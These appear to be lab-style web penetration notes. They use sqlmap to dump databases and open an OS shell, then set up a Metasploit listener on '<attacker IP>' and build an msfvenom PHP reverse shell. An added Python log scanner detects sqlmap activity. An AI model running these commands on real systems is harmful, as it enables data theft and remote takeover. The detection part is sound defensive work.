1. Open http://ip:port in a browser and look through the page for information
2. Scan the site with the web vulnerability scanner OWASP ZAP
3. Use sqlmap to exploit the SQL injection vulnerability
sqlmap -u url --dbs    # list the database names
sqlmap -u url -D "database name" --tables    # list the tables in that database
sqlmap -u url -D "database name" -T "table name" --columns    # list the columns (fields) in that table
sqlmap -u url -D "database name" -T "table name" -C "column name" --dump    # dump the values of that column
You can also try sqlmap -u url --os-shell to get a shell directly
4. ifconfig
netstat -pantu    # view local port usage
5. Start the listener on the attacking machine
msf > use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost <attacker IP>
set lport 4444
run
6. Generate the reverse shell
msfvenom -p php/meterpreter/reverse_tcp lhost=<attacker IP> lport=4444 -f raw > /root/Desktop/shell.php
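
For step 3, a defender's view of the same activity, as an added example that is not part of the original notes: a Python scan of web access logs for sqlmap's default User-Agent and for the metadata queries behind --dbs, --tables and --columns. The log lines are constructed, and the information_schema patterns assume a MySQL-style backend.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=schema+design HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Assumption: MySQL-style metadata tables; other DBMSs use different catalogs.
STAGE_RE = re.compile(r"information_schema\.(schemata|tables|columns)", re.I)
STAGES = {"schemata": "enum-databases", "tables": "enum-tables", "columns": "enum-columns"}


def scan(log_text):
    """Return {client_ip: sorted list of rule names that fired}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        # Decode twice so double-encoded payloads (%2520) are still inspected.
        url = unquote_plus(unquote_plus(m["url"]))
        if m["ua"].lower().startswith("sqlmap/"):
            hits[m["ip"]].add("sqlmap-user-agent")
        for stage in STAGE_RE.findall(url):
            hits[m["ip"]].add(STAGES[stage.lower()])
    return {ip: sorted(rules) for ip, rules in hits.items()}


if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(rules))
```

The User-Agent header is client-controlled, so treat that rule as a convenience signal and rely on the payload rule. Access logs do not record POST bodies, so injection through form fields needs application or WAF logging instead.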